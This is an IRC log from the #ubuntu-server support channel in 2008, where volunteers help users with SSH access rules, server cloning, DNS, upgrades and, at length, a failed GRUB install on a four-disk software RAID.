 * flyback feels better
<trashguy> lol
<trashguy> i ran redhat forever
<trashguy> fedora is just not useable anymore
<flyback> me too
<slangasek> infinity, mathiaz: ping
<flyback> f9 has pissed me off beyond reasoning
<trashguy> yes
<flyback> this box is getting hosed soon
<mathiaz> slangasek: hello
<trashguy> i since migrated my desktop to ubuntu
<flyback> at least uCUNTu actually runs shit like vmware
<trashguy> and i been pushign a zimbra migration atw ork
<trashguy> and its not so nice with FreeBSD so i had to find an alternative
<slangasek> mathiaz: note flyback's comments; he's been asked before to behave himself in other channels
<flyback> i'm bitter when I been burned by crappy products
<nalioth> let us be civil
<slangasek> that's hardly an excuse for repeated use of inappropriate language
<infinity> flyback: Please watch the language.
<flyback> ok
 * trashguy didnt notice anything
<flyback> fair enough there
<trashguy> only issue i have had with ubuntu so far
<trashguy> had to make a bunch of symbolic links ot get veritas netbackup to work
<hotmonkeyluv> How can I configure the network interfaces after installation?
<lukehasnoname>  /etc/network/interfaces
<Stainer> anyone familiar with setting up a safe host to use a mailserver when you have a dynamic ip address?
<hotmonkeyluv> lukehasnoname:  thanks!
<hotmonkeyluv> lukehasnoname:  hmmm, didn't seem to work
<hotmonkeyluv> says command not found
<slangasek> that's a file to edit, not a command
<hotmonkeyluv> ah
<hotmonkeyluv> i, uh... I knew that...
<flyback> interfaces and also iftab in 6.06 if you are doing disk clones
 * flyback bites jkakar 
<flyback> CANUCK
<flyback> CANUCK
<flyback> CANUCK
<flyback> CANUCK
<jkakar> Uh.  Hi.
<flyback> that's for william shatner's greatest hits and other canadian acts of terrorism
<randomlogic78> I would like to prevent users from logging in via ssh and allow only users in a particular group.  I've edited /etc/ssh/sshd_config  and added the line "AllowGroups groupname" but any user can still ssh
<Deeps> randomlogic78: man page suggests that default is to allow all, so maybe you need a deny all rule first?
<Deeps> (man sshd_config)
<randomlogic78> thanks... deny all didn't work... but it turned out I was editing ssh_config instead of sshd_config
 * the_silent wb all
<the_silent> an one can help me?
<flyback> with?
<the_silent> i have some problem bro
<the_silent> iwant built new server wit ubuntu 8
<flyback> go on
<the_silent> i mean ubuntu server
<the_silent> hmm the problem is
<flyback> you are canadian?
<the_silent> iwant copy old ubuntu server on new harware
 * the_silent no
<flyback> that was a joke
<the_silent> iam from indonesia
<flyback> <the_silent> hmm the problem is
<flyback> <flyback> you are canadian?
<the_silent> whatt
<the_silent> nope
<the_silent> i have bad english
 * the_silent sorry
<flyback> it was a bad joke :P
<flyback> sorry :P
<flyback> hmm
<the_silent> so can u help
<the_silent> me
<flyback> there are tools to clone linux
<the_silent> ok
<flyback> ghost4unix
<the_silent> wahat its is
<flyback> clonezilla
<the_silent> hm
<the_silent> ok
<flyback> I have not used those yet though
<flyback> so I dunno how well they work
<flyback> sorry
<the_silent> on not problem
 * the_silent thanks bro
<the_silent> xixixix
<the_silent> oh yeah
<flyback> http://www.clonezilla.org/
<the_silent> one more again
<kgoetz> mondo rescue
<flyback> http://www.feyrer.de/g4u/
<flyback> http://www.clonezilla.org/
<the_silent> can u tell me how to install new driver on ubuntu server after i cloned
 * the_silent iam newbei
<the_silent> :)
<kgoetz> the_silent: what driver
<flyback> yeah I have not done that yet sorry
<the_silent> o
<the_silent> oo
<the_silent> iwant built new server on intelmainboard xeon s5000sata server
<the_silent> so can u tel me the tutorial about update driver mainboard
 * the_silent :)
<kgoetz> two options: all drivers are in the kernel. swap os -> eddit grub -> boot -> profit
<kgoetz> 2nd option: you need to change something (eg, 32-> 64 bit) -> backup existins erver -> install clean on new server -> restore backup -> reconfigure new server -> profit
<the_silent> hmmm
<the_silent> nice
<kgoetz> s/something/something major
<the_silent> can u teell me where i can find this tutorian on website
<the_silent> ???
<kgoetz> to do what?
<the_silent> find some tutorial
<kgoetz> to do what?
<the_silent> to update driver
<the_silent> main board
<kgoetz> do you need to update it?
<the_silent> yes
<the_silent> i mean update hardware
<the_silent> not os
<kgoetz> i dont follow
<the_silent> coz the os was using from old main board
<the_silent> use cloning
<the_silent> like that
<kgoetz> how do you know you'll need to update the driver?
<the_silent> hmm
<the_silent> i dont know
<the_silent> i just scared
<the_silent> if the hardware need driver from new mainboard
<the_silent> oh i mean the u buntu server nedd driver from new mainboard
<the_silent> sorry
<the_silent> i have been confiuse
 * the_silent :_(
<kgoetz> :\
<flyback> it might
<kgoetz> the_silent: try a live cd with the reelease you want to copy over in the new server
<the_silent> hmm
<the_silent> i see
<the_silent> so u mean is
<the_silent> try live cd n then istall
<the_silent> then copy setting old ubuntu server data on new server
<the_silent> like that?
<the_silent> or not
<kgoetz> try the live cd
<kgoetz> if it detects your hardware, it detected it
<flyback> good luck the_silent
<flyback> I am going out
<the_silent> ok
<the_silent> thanks very muck
<flyback> you are welcome to come here any time :)
<the_silent> ok
<the_silent> iwell be
<the_silent> :)
<the_silent> have a nice day
<flyback> you too
<the_silent> :)
<flyback> http://www.dealextreme.com/details.dx/sku.7621 <-- great logo for a battery
<[Solaris]> I want to diagnose a problem i have with a raid 0 (has win installed on it) and all members are offline
<[Solaris]> are there tools in ubuntu to allow me to investigate ?
<[Solaris]> and possibility repair?
<ropetin> [Solaris]: My initial feeling is no.  What happened though?
<[Solaris]> had a faulty memory stick... but it screwed up my raid on a hard reset
<[Solaris]> made all my sata disks go offline .. so i have no raid volume
<ropetin> Striped or mirrored?
<[Solaris]> raid0
<slangasek> that would be entirely dependent on the details of your RAID implementation; Linux software RAID is definitely not compatible with any Windows software RAID
<ropetin> Oh yeah, you said that, striped
<ropetin> You're pretty much screwed I think.  If Windows doesn't recognize it
<[Solaris]> heh windows doesn't even boot
<slangasek> and if it's hardware RAID, you don't have any diagnostic access from the OS at all unless the controller can be set to a non-RAID mode
<[Solaris]> so it won't see it
<ropetin> Striped boot partition?
<ropetin> Is that even possible?
<[Solaris]> i thikn it got screwed up when i was playing the MBR with the faulty memmory
<ropetin> I'm thinking screwed, yeah
<[Solaris]> erm is there a tool that i can rewrite the mbr on the device (bios sees the drives) and maybe that wil lfix the issue?
<ropetin> Is your boot partition striped?  (I didn't think Windows could do that)
<[Solaris]> yea
<[Solaris]> (atleast thats what i am thinking)
<[Solaris]> was all raid0 disk except the hd3 which was a solitair drive
<[Solaris]> erm there is a tool called mpt-status
<[Solaris]> wonder if that would work
<kgoetz> ropetin: yes, striped boot partition is posible
<ropetin> kgoetz: Sounds veeeery risky without backup
<kgoetz> ropetin: striped raid is *always* very risky.
<[Solaris]> well looks like i am going have to destruck that drive
<ropetin> True!
<[Solaris]> so think i should step away from raid0 and use some other raid?
<[Solaris]> perhaps go with a raid5 ?
<kgoetz> [Solaris]: depends on your context
<kgoetz> and backup habbits
<[Solaris]> well i didn't even get a chance to backup the first time
<[Solaris]> fresh install of both OS on a new system
<[Solaris]> so destruction isn't bad, just a lose of a few hours
 * delcoyote hi
<[Solaris]> erm i can do a raid 0 0+1 1 and 5
<[Solaris]> might even be able to do raid 2 (not sure yet)
<_ruben> raid0 isnt even raid
<kgoetz> valid point
<_ruben> *Redundant* Array of Inexpensive Disks
 * kgoetz isnt convinced the discs in his servers here are "Inexpensive"
<_ruben> relatively speaking they are
<_ruben> 450GB SAS disks are expensive .. but 2TB SAS disks (if they'd exist) would be much more expensive ... :p
<kgoetz> relatively isnt very helpful - relative to you, i'm a long way away
<_ruben> hehe ;)
<kgoetz> _ruben: 750GB sas drives, lots of. 1TB sas drives, some of
<[Solaris]> these are 400GB SATA drives LO
<kgoetz>  cost ++
<[Solaris]> so not all that expensive
<_ruben> 750GB and 1TB sas disks already exist?
<_ruben> (i dont monitor developments in that area that closely)
<kgoetz> pretty sure they are sas. perhaps they are standard sata drives in hot-swap enclosures, but i'm prtty sure they are sas
<_ruben> installed 3 servers with 6x450G sas disks the other day
<_ruben> 750G and 1TB sounds rather sata'ish to me
 * kgoetz cbf looking at the spec sheet right now
<_ruben> sas and sata are interchangable ..
<_ruben> :)
<kgoetz> sort of :) sas can mean 'sa scsi' too
<_ruben> sas = serial attached scsi .. which is a scsi disk with sata connector :)
<kgoetz> _ruben: btw, i think your correct - the drives are probably sata
<_ruben> thats what i meant with interchangable
<kgoetz> aaah, my bad. misunderstanidng :)
<kgoetz> *sp
<_ruben> happens to the best of us :)
<kgoetz> :)
<kraut> moin
<antdedyet> morn
<Gestahlt> Hi
<Gestahlt> is there a deb represitory for freePBX?
<alien> hello, did canonical think about supporting openvz better, instead of just KVM?
<alien> imho, openvz is much more suited to server usage than both kvm and xen, due to its low overhead
<alien> and it supports most of the goodies that both xen and kvm support, like live migration
<Koon> alien: you should ask that question in #ubuntu-virt
<alien> thanks Koon
<Gestahlt> uhm
<Gestahlt> Is there a freeBPX deb package for ubuntu 8.04 server
<Gestahlt> ?
<ropetin> Not as far as I know, no
<Gestahlt> damn
<rgl> hello
<ivoks> hi
<rgl> I have a box with ubuntu edgy (6.10), and I want to upgrade it to latest 8.04.1.  I'm trying to follow https://help.ubuntu.com/community/FeistyUpgrades , so I did use the old-releases.ubuntu.com repository and used the do-release-upgrade command, but it failed, can you look at http://dpaste.com/80688/ ? do you have any ideia how to fix this?   better yet, can't I just update my sources.list file and use apt-get dist-upgrade?
<Kamping_Kaiser> no, you cant
<Kamping_Kaiser> edgy isnt hosted on archive.u.c anymore - this error may be a bug in the upgrade tool, or some user error (i havent used it, i cant comment)
<rgl> yes, its at old-releases.ubuntu.com
<Kamping_Kaiser> which is clearly not where the upgrade thingy was trying to download from :)
<rgl> so what should I do?
<rgl> the correct output from the upgrade tool is at http://ruilopes.com/tmp/output.txt
<Kamping_Kaiser> i guess you can hang around, perhaps someone with more experiance an help you
<rgl> its kinda lame apt-get dist-upgrade does not work :(
<Kamping_Kaiser> personally, i agree.
<Kamping_Kaiser> i've not had to upgrade any ubuntu servers, so i cant comment on wether it works or not
<rgl> oh well, my only other option is to install a fresh 8.04.1 and migrate stuff arround.
<maswan> dist-upgrade might work just fine, but chances are that some new packages expected won't get pulled in, corner cases might get broken, etc, etc.
<rgl> oh, I'm not finding the ubuntu support timeline thingy;  its the doc that mentioned the different support times, eg, edgy has 18 month support, LTS 5 years, etc.   do you known where is it?
<rgl> ah found it at http://www.markshuttleworth.com/archives/146 *G*
<rgl> well, kinda of, that is only for stuff after 8.04
<Kamping_Kaiser> perhaps a link off herehttp://www.ubuntu.com/products/whatisubuntu/serveredition
<Kamping_Kaiser> perhaps a link off here http://www.ubuntu.com/products/whatisubuntu/serveredition
<frith> hello, can anyone point me in the right direction for dell omsa packages?
<frith> that is if they exist
<kaushal> hi
<kaushal> how can i use upstart
<kaushal> I have edited the files under /etc/event.d/
<kaushal> what would be the next step
<kaushal> when i run initctl reload it does not work
<rgl> what do you mean kaushal ?
<kaushal> rgl: it says invalid option
<rgl> I still have no ideia what are you talking about
<kaushal> rgl: I am talking about upstart init daemon
<rgl> kaushal, eg. what did you do? and what you expected to happen?
<rgl> kaushal, there an #upstart channel too
<mathiaz> Koon: nagios3 seeded
<Koon> mathiaz: kewl
<mathiaz> kirkland: I've also added partman-auto-raid to the installer
<kirkland> mathiaz: cool
<mathiaz> kirkland: that means we'll be able to preseed raid installation to test boot from degraded RAID :D
<Koon> mathiaz: i'll have some free time next week, if there is any area you want tested, let me know. Otherwise I'll do some generic bug triage/cleanup
<kirkland> mathiaz: awesome!
<kirkland> mathiaz: auto testing
<mathiaz> Koon: ok - I'll keep this in mind.
<rgl> this is so odd: apt-get --purge remove libusb-0.1-4  wants to remove: gnupg* libusb-0.1-4* ubuntu-keyring*  !!
<RediXe> How would I go about keeping a directory on my server in sync with my a directory on my machine?
<elventear> Hello. I am looking the netback.c file in the Xen Linux Kernel source. I got the Kernel Source from the repos but that file is missing. Anyone know a way that I can find the source that Ubuntu uses for that file?
<zul> elventear: kernel.ubuntu.com
<elventear> Thx
<ivoks> git clone git://kernel.ubuntu.com/ubuntu/ubuntu-intrepid.git
<Database> OK, I have a slight problem.
<Database> When I try to change my domain name's A record to my server, the host's site responds that it must be an IP address. However, I can't supply one as I'm using No-IP because of my dynamic IP address.
<mathiaz> Database: that's because you need define a CNAME instead of a A record
<Database> Right, and I have done that.
<Database> For www.
<Database> I need the domain name without the www. as well.
<mathiaz> Database: depending on you dns provider, you may not be able to set a CNAME for you domain name.
<Database> I probably can't, then.
<Database> So what are the consequences of that?
<mathiaz> Database: people won't be able to access the website via domain.com, only via www.domain.com
<Database> Bugger.
<Database> That is bad.
<Database> So there's no way around it?
<mathiaz> Database: probably not - you should check with your dns provider.
<Database> Alright, thank you.
<lukehasnoname> I found a guy who wrote a web server in PHP
<lorddarkpat_> I've been following http://flurdy.com/docs/postfix/
<lorddarkpat_> to set up  mail servre
<lorddarkpat_> will it get me set up?
<stoner> lorddarkpat_, im no expert, but looks like it does.. i personally used https://help.ubuntu.com/community/MailServer few weeks ago and it works
<lorddarkpat_> thnks, stoner :)
<lorddarkpat_> I'm also having DynDNS troubles
<lorddarkpat_> apache is not working with it
<lorddarkpat_> it should work
<lorddarkpat_> thnks, stoner :)
<\sh> does anyone work on ubuntu-server and heartbeat2+HA nfs cluster?
<\sh> if so..don't trust all docs on the net, telling you to move the /var/lib/nfs/<whatever> dir on a drbd device...that's totally wrong and doesn't work..leave it where it is, and you are clean
<lamont> jdstrand: 9.4.2.dfsg.P2-2 uploaded, thanks
<jdstrand> lamont: ack
<lamont> jdstrand: meh.  re-uploading
<lamont> jdstrand: and accepted this time... helps to have the .orig.tar.gz file :-)
<jdstrand> heh
<jdstrand> lamont: I wasn't sure if LP was slow, so I was being patient :)
<lamont> nah - it was me being a muppet
<uvirtbot> New bug: #274939 in php5 (main) "8<=8 => false " [Undecided,New] https://launchpad.net/bugs/274939
#ubuntu-server 2008-09-27
<Linyuan> I am following the Guide on the https://help.ubuntu.com/community/KVM
<Linyuan> I have done all the steps until I got an error on the Installation using the virt-install to install a unix VM.
<Linyuan> sudo virt-install --connect qemu:///system -n freebsd6 -r 512 -f freebsd6.img -s 4 -c 7.0-RELEASE-amd64-disc1.iso --vnc --accelerate --noautoconsole
<Linyuan> Starting install...
<Linyuan> libvir: QEMU error :
<Linyuan> libvir: QEMU error :
<Linyuan> libvir: QEMU error :
<Linyuan> Creating storage file...  100% |=========================| 4.0 GB    00:00
<Linyuan> Creating domain...                                                 0 B 00:00
<Linyuan> Domain installation still in progress.  You can reconnect to
<Linyuan> the console to complete the installation process.
<Linyuan> I see no actual error message there and I can't connect to the VNC by
<Linyuan>   virt-viewer qemu+ssh://192.168.1.115/system
<Linyuan> I can see the domain running by virsh list
<Linyuan> However I can't connect to it. What should I do?
<Linyuan> Could anybody help? I have been working on this problem for more than 6 hours, I really don't want to fall back to the vmware solution for my new VMs.
<Linyuan> I have some problem with installing a VM with the virt-install, with no specific error message and I cant connect to the console of the newly created VM. What should I do?
<[Solaris]> installing on a mobo with a "hardware' raid .. a.k.a. "fakeRAID" do i need to tell the bios to turn off the raid for a software raid?
<[Solaris]> should i disable the fake raid inbios to install on a software raid?
<Kamping_Kaiser> you dont have to tell it to turn it off, but you may as well
<[Solaris]> kk, just want to make sure my bios is setup right
<[Solaris]> for software raid
<[Solaris]> any tips for setting up a software raid that isn't really explained much in the howto's?
<jmedina> [Solaris]: the official software raid howto
<jmedina> [Solaris]: http://tldp.org/HOWTO/Software-RAID-HOWTO.html
<[Solaris]> thanks jmedina reading it now
<[Solaris]> jmedina thanks for the info ... now its time to see if i can install ubuntu on this raid
<[Solaris]> manually configureing the drives during install, do I need to allicate a swap partition and a root partition at this time or .. just set the entire (max size) to "phyical volumn for raid"
<randomlogic78> I'm trying to setup a chroot jail for people logging into my server via ssh
<randomlogic78> I've got the chroot env set up... but I don't know how to force the users into the chroot when the log in, and prevent them from exiting
<uvirtbot> New bug: #275035 in mysql-dfsg-5.0 (main) "Installing MythTV" [Undecided,New] https://launchpad.net/bugs/275035
 * mneptok blinks
<mneptok> whose bot is that?
<[Solaris]> heh i feel so good now, finually figured out hw to do a software raid setup
<[Solaris]> does grub install on all hard drives automatically?
<[Solaris]> or do i need to go and install on each drive manually?
<sp4sm69> Solaris: i think you need to install to each drive manually
<[Solaris]> kk
<[Solaris]> erm does grub normally fail on a software raid on a new install?
<[Solaris]> strange
<[Solaris]> can't install grub, but i can run the restore on the alt. install cd go to cmd prompt for my /dev/md0 and start x
<[Solaris]> mdraid showed references to the old raid .. e.g. raid name and number disks was in it
<flyback> collapses on the floor crying from the sound of mikey mouse having sex family guy
<kees> [Solaris]: if grub didn't work on Intrepid with MD, please file a bug.  kirkland has done a lot of work on it recently, so it should be working.
<[Solaris]> kees I'll do that once i figure out how i can get around it .. or if its even my system fault or not
<kees> [Solaris]: what's the problem, exactly?
<[Solaris]> during install process following https://help.ubuntu.com/community/Installation/SoftwareRAID
<[Solaris]> it got to the point where it went to install grub and it puked
<[Solaris]> now only way i can get onto my "raid" is go into rescue mode, mount /md0 and go to a shell
<[Solaris]> there wasn't even a /boot/grub/menu.lst
<kees> that document is out of date (all the manual grub stuff isn't needed now)
<kees> what were the errors when it puked?
<[Solaris]> and i an't get supergrub to fix it either
<[Solaris]> i don't remember lemme go recreate it :P
<kees> cool, please open a bug with the output.  that should help kirkland when he looks into it.
<[Solaris]> i know 100% sure grub did not install or touch mbr
<[Solaris]> i also noticed with mdraid that the disks shoued infomation about its previous life as part of the "fakeraid' (e.g. volumn name and #of disks)
<kees> hrm... fakeraid I don't know about.
<[Solaris]> fakeraid = so called hardware raid that requires a driver
<[Solaris]> its basically software assisted raid to allow windows to see them as a 'raid volumn'
<[Solaris]> when ubuntu looks at the them .. it sees the individual drives
<kees> yeah, that's the dmraid stuff.  I have no idea how that might impact a normal MD setup.
<[Solaris]> well lets see if ican recreate thge flaw...i am at the the point of setting up the drives
<[Solaris]> each drive is 400GB ... i dedicated 394 GB to "root" and rest to swap
<[Solaris]> that seems big for the swap drive .... now that i think about it 24G just for swap
<[Solaris]> reformating root with ext2 format
<[Solaris]> this part takes a bit 1.2TB raid
<kees> why not ext3?
<[Solaris]> no idea
<[Solaris]> prolyl should of done ext3
<[Solaris]> i'll go back and fix that
<[Solaris]> just have to wiat till it finishes what its doing now
<[Solaris]> (restarted cuase it was faster then waiting and really lost nothing)
<[Solaris]> just waiting for ext3 to finish formating
<[Solaris]> instlaling OS
<[Solaris]> should be nearing the grub installation
<[Solaris]> kees dunno if it passed that point or not, but i be upset if doesn't break again lol
<[Solaris]> kees "executing `grub-install (hd0)' failed
<[Solaris]> this is a fatel error
<[Solaris]> not sure how to get a dump out of that
<[Solaris]> can i get it to spit out more info?
<[Solaris]> actually
<[Solaris]> ctrl-f4 :P
<[Solaris]> it saying that stage1 not read correctly
<ivoks> do you have any USB devices attached?
<ivoks> like a usb stick or disk
<[Solaris]> erm a usb mouse
<ivoks> are you still installing?
<[Solaris]> still in the install sequence but halted at the error
<ivoks> ctrl+alt+f2
<ivoks> chroot /target /bin/bash
<[Solaris]> kk
<ivoks> now, is there anything in /boot/grub/?
<[Solaris]> yes
<ivoks> like device.map, stage1, etc...
<[Solaris]> but no menu.lst
<ivoks> that's ok
<ivoks> cat device.map
<ivoks> no such file?
<[Solaris]> "(hd0) /dev/sda" "(hd1) /dev/sdb" etc etc "(hd3) /dev/sdd"
<ivoks> ok... so are you installing your system on /dev/sda?
<[Solaris]> on all
<ivoks> all?
<[Solaris]> software raid
<[Solaris]> ./dev/md0
<ivoks> ok... what raid?
<[Solaris]> raid5
<ivoks> 0, 1, 5?
<ivoks> and your /boot is on raid5?
<[Solaris]> i believe so
<ivoks> that won't work
<ivoks> grub can't read from raid5
<ivoks> it can from raid1
<[Solaris]> ohh... ern
<ivoks> otoh, i don't know about lilo
<ivoks> but i doubt you could 'spread' MBR over 3 devices :D
<[Solaris]> *cough* 4
<ivoks> right, 4
<ivoks> here's and advice
<[Solaris]> well using the alt installation cd
<[Solaris]> and going into rescue mode, i can get into the raid
<ivoks> create 1GB partition on all four disks
<[Solaris]> kk
<ivoks> create raid1 with 2 of them and another raid1 with another 2
<ivoks> hm... is it possible to create raid1 with 4 disks?
<[Solaris]> yes
<[Solaris]> raid 1 requires pairs of disks
<[Solaris]> i.e. its mirror raid ..iirc
<ivoks> then, create raid1 with 4 partitions
<ivoks> with those 1GB partitions
<ivoks> and mount that raid as /boot
<ivoks> create swap partitions and then rest (or just a part) as raid5 for /
<[Solaris]> erm i can do that
<ivoks> if you are going to swap a lot, then thing about creating raid1 with swap
<[Solaris]> what part of the disk is ideal to put the /boot
<[Solaris]> not planning on swapping
<ivoks> i usually put swap on the begining, cause r/w on the begining of disk is a bit faster
<[Solaris]> i would be using raid 0 or 10 if it wasn't for having a bad mem stick killing several raid attempts
<ivoks> and then /boot
<[Solaris]> how big does /boot really need to be
<[Solaris]> blah i have plenty of room
<ivoks> depends on a liftime of server :)
<ivoks> lots of kernels could end up there
<[Solaris]> 4 400.1G drifves
<ivoks> 500MB should be enough
<[Solaris]> 500mb / 4 = 125mb per
<ivoks> no
<ivoks> 500MB on each
<ivoks> eaquals 500MB :)
<ivoks> cause you are mirroring
<[Solaris]> heh i was thinking raid 5
<[Solaris]> but even that was wrong
<ivoks> in raid5, 125MB each would be 325MB total
<ivoks> 375
<ivoks> :)
<[Solaris]> see neither of us can do math
<[Solaris]> so lemme restart
<[Solaris]> erm i could try
<[Solaris]> raiding disk 1 and 2
<[Solaris]> raiding disk 3 and 4
<[Solaris]> then raid raid 1 with raid 2 :P
<[Solaris]> j/k
<ivoks> no
<ivoks> raid all four of them
<ivoks> if possible
<ivoks> if not, then like you said raid 1+1 :D
<[Solaris]> i been working on getting this pc setup since tuesday :P
<[Solaris]> first I tried installing winxp64 pro.... had memory problems killing "fakeraid"
<[Solaris]> then i tired dualbooting with hardware raid .. that didn't work then... then just virtualize ubuntu inside winxp64 till memory killed the raid. .(found out the problem this time and removed the ill stick)
<[Solaris]> so i said screw it and started installing ubuntu :P
<ivoks> which hardware raid?
<[Solaris]> ich9
<[Solaris]> on a gigabyte p35 board
<ivoks> i doubt that's a hardware raid :)
<[Solaris]> its a fakeraid
<ivoks> right :)
<[Solaris]> i want /boot to be bootable i assume :P
<[Solaris]> ohh erm
<[Solaris]> so with a raid1 you have 4 disks
<[Solaris]> first disk is pri the second, third, fourth are just redudents
<[Solaris]> so the size is still 500 mb
<[Solaris]> its not commulative
<ivoks> right
<[Solaris]> so 500mb big enough for /boot
<ivoks> yes
<[Solaris]> kk
<[Solaris]> going to add swap now :P
<ivoks>  /boot shouldn't pass 100MB, but just to be sure, 500MB :)
<[Solaris]> typically swap is >= 1.5 x memory ?
<ivoks> not really
<ivoks> how much memory do you have?
<[Solaris]> 4G
<ivoks> 2GB should be enough
<ivoks> you don't want to big swap
<ivoks> cause if you fill out 4GB, then something is really wrong
<[Solaris]> heh true
<ivoks> and if your 'bugy' program starts filling 6 or 8GB
<ivoks> you won't be able to log in and kill it
<ivoks> cause of big i/o waint caused by writting to disk
<ivoks> s/waint/wait/
<[Solaris]> erm so 2g / 3 = (2 x 1024 =2048)/3 = 682.6M
<[Solaris]> odd ball number :P
<ivoks> you want swap in raid5?
<[Solaris]> yea
<ivoks> i think it would be better just to create 4 swaps
<ivoks> without raid
<ivoks> imho, that would be faster than raid5
<ivoks> but, i could be wrong :)
<[Solaris]> swap shouldn't really be used with 4g memory
<[Solaris]> either
<[Solaris]> iirc
<\sh> grmpf...
<\sh> did anyone solve linux + bonding + vlan + ipvs via a 4Gbit/s portchannel + port flapping on cisco routers?
<\sh> I wonder if I should set spanning-tree portfast on the portchannel ports to stop that..
<ivoks> brb
<[Solaris]> ivoks well got it installing now
<[Solaris]> we'll see if it works
<[Solaris]> prolly another 30 mins or so
<ivoks> it will work :)
<[Solaris]> ivoks this stuff (playing with disks and partitions) reminds me of the days of slackware and the dreaded 24+ floppies
<ivoks> :)
<[Solaris]> when you had to partition out your drive for various things lol
<[Solaris]> looks like its cleaning up from the installs
<[Solaris]> this is going to be nice
<ivoks> :)
<[Solaris]> installing grub
<[Solaris]> and it...
<[Solaris]> didn't work
<ivoks> how come?
<[Solaris]> stage1 not read correctly
<ivoks> alt f2
<ivoks> chroot /target /bin/bash
<[Solaris]> at bash
<ivoks> grub
<ivoks> ind /grub/stage1
<ivoks> find /grub/stage1
 * [Solaris] waits for the probing to stop
<[Solaris]> error 15: file not found
<ivoks> quit
<ivoks> is there anything in /boot/grub?
<[Solaris]> yepp
<ivoks> stage1?
<[Solaris]> yepp
<ivoks> in device.map, hd0 is mapped to /dev/sda?
<ivoks> should be /dev/md0
<[Solaris]> nope
<ivoks> or md1, depends on what is /boot
<\sh> grmpf...where do someone get real serial cables nowadays, which are working with heartbeat...well, ucast does work too...
<[Solaris]> it has /dev/sda
<[Solaris]> instea of /dev/md0
<ivoks> open it, change /dev/sda to /dev/md0
<ivoks> did you?
<[Solaris]> heh took a momment to remember my vi commands
<[Solaris]> but yea
<ivoks> now run grub
<[Solaris]> erm so this part trial and error to see which /dev/md* /boot is on?
<[Solaris]> still didn't find stage one
<[Solaris]> err /grub/stage1
<ivoks> root (hd0,0)
<[Solaris]> kk
<ivoks> no errors?
<[Solaris]> nope
<[Solaris]> just echoed the command back to me
<ivoks> setup (hd0)
<ivoks> er... hm...
<[Solaris]> that had errors
<ivoks> of course...
<ivoks> i gave you wrong instructions :)
<[Solaris]> heh
<ivoks> just a second...
<ivoks> so... hd0 should be /dev/sda
<ivoks> that was ok
<ivoks> sorry for that
<[Solaris]> heh
<ivoks> so, change it back :)
<ivoks> now, do 'cat /proc/mdstat'
<[Solaris]> done
<ivoks> check if md0 is in sync or still syncing
<[Solaris]> no such file or directory
<ivoks> exit the chroot
<ivoks> just enter exit
<[Solaris]> done
<ivoks> cat /proc/mdstat
<[Solaris]> what you want to know
<[Solaris]> its a quarter page long
<ivoks> md0 :
<ivoks> should be something like:
<ivoks> md0 : active raid1 sda1[0] sdb1[1] sdc1[2] sdd1[3]
<ivoks> my guess is that sda1 isn't the 0
<ivoks> or sda2
<[Solaris]> md0 : active raid1 sdd1[3] sdc1[2] sdb1[1] sda1[0]
<ivoks> ah, i tought so...
<[Solaris]> 489856 blocks [4/4] [UUUU]
<ivoks> all UUUU?
<ivoks> nice...
<ivoks> sda1 was the last to sync, and the installer tried to read stage1 from it
<ivoks> and failed, cause it was out of sync :)
<ivoks> that's my guess
<[Solaris]> so how we 'resync' thm
<ivoks> they are in sync how
<ivoks> now
<ivoks> so, go back to alt+f1
<ivoks> and try re-running grub installer
<[Solaris]> kk
<[Solaris]> nope
<ivoks> try with lilo
<[Solaris]> heh lilo atkeast ask what raid to put it on
<[Solaris]> fatel
<[Solaris]> only raid1 devices are supported as boot devices
<[Solaris]> raid1 = /boot
<[Solaris]> and i flagged that as bootable
<ivoks> strange...
<ivoks> ok, try this
<ivoks> chroot /target /bin/bash
<[Solaris]> kk
<ivoks> cp /usr/lib/grub/i386-pc/* /boot/grub/
<ivoks> grub
<ivoks> find /grub/stage1
<[Solaris]> i don't ahve i386 :p
<ivoks> ah... 64bit?
<[Solaris]> yea
<ivoks> then x64..whatever :)
<[Solaris]> heh
<[Solaris]> in grub
<[Solaris]> can't find stage1
<ivoks> bummer
<ivoks> i really don't have any ideas now...
<[Solaris]> how do i check the intergity of the raids and thier mount points
<ivoks> try with /boot on two disk mirror
<ivoks> cat /proc/mdstat
<ivoks> that will tell you the state or raids
<[Solaris]> make sure i don't have another raid flagged bootable
<ivoks> that's irrelevant
<ivoks> i'll be back later
<ivoks> you can always setup /boot on raid1 with two disks or with /boot on only one disk
<ivoks> after that you can play with partitions after you install your system
<ivoks> that's 8.04, right?
<[Solaris]> in cat /proc/mounts i don't think i see "/boot" in there
<[Solaris]> yea this is 8.04
<[Solaris]> the system is installed
<[Solaris]> erm my "/root" raid is resynching dunno if that would be part of the problem or not
<[Solaris]> ~70% don
<[Solaris]> e
<ivoks> [Solaris]: root sync isn't relevant...
<ivoks> [Solaris]: /boot is your problem
<[Solaris]> yea
<ivoks> [Solaris]: i never had any problems with /boot on raid1 of two disks...
<ivoks> maybe you should try that
<[Solaris]> heh could use mdadm to disable 2 of the drives/partition of /dev/md0
<[Solaris]> but don't think that would resolve the issue
<[Solaris]> what prolly i should of done
<[Solaris]> is done 2 disk with the other two disks as standby
<[Solaris]> dunno if i cna change that w/o reinstalling
<[Solaris]> how can i tell if /dev/md0 is actually mounted anywhere
<[Solaris]> fstab?
<[Solaris]> when i mount /dev/md0 to /mnt
<[Solaris]> and do a ls
<[Solaris]> it is empty
<ivoks> empty?
<[Solaris]> yea
<ivoks> you didn't set up a mount point?
<[Solaris]> shouldn't it contain all that "boot" stuff
<ivoks> ah... your boot is still on raid5 :D
<[Solaris]> yea
<ivoks> doh...
<[Solaris]> and the raid5 doesn't have a bootflag
<ivoks> md0 shoud be mounted to /boot
<ivoks> during partitioning, when you create md0, you have to define mountpoint
<ivoks> it shoud be /boot
<[Solaris]> i suppose i can use fdisk to recreate it
<ivoks> no, no need
<[Solaris]> i think mdadm can fix it
<ivoks> just go back to partitioning
<[Solaris]> won't let me
<ivoks> and choose /boot as a mountpoint for /dev/md0
<[Solaris]> cuase everything already installed
<ivoks> ok
<ivoks> let's do it like this
<ivoks> alt+f2
<[Solaris]> kk
<ivoks> umount /mnt (or wherever you've mount it)
<[Solaris]> kk
<ivoks> mkdir /boot_tmp
<[Solaris]> on the target
<ivoks> cp -a /target/boot/* /boot_tmp/
<[Solaris]> or ..
<ivoks> mount /dev/md0 /target/boot
<ivoks> cp -a /boot_tmp/* /target/boot/
<[Solaris]> with it mounted try grub?
<ivoks> not yet...
<ivoks> nano /target/etc/fstab
<ivoks> and add:
<ivoks> /dev/md0 /boot ext3 relatime 0 0
<ivoks> at the end
<[Solaris]> heh can't nano
<ivoks> nano-tiny
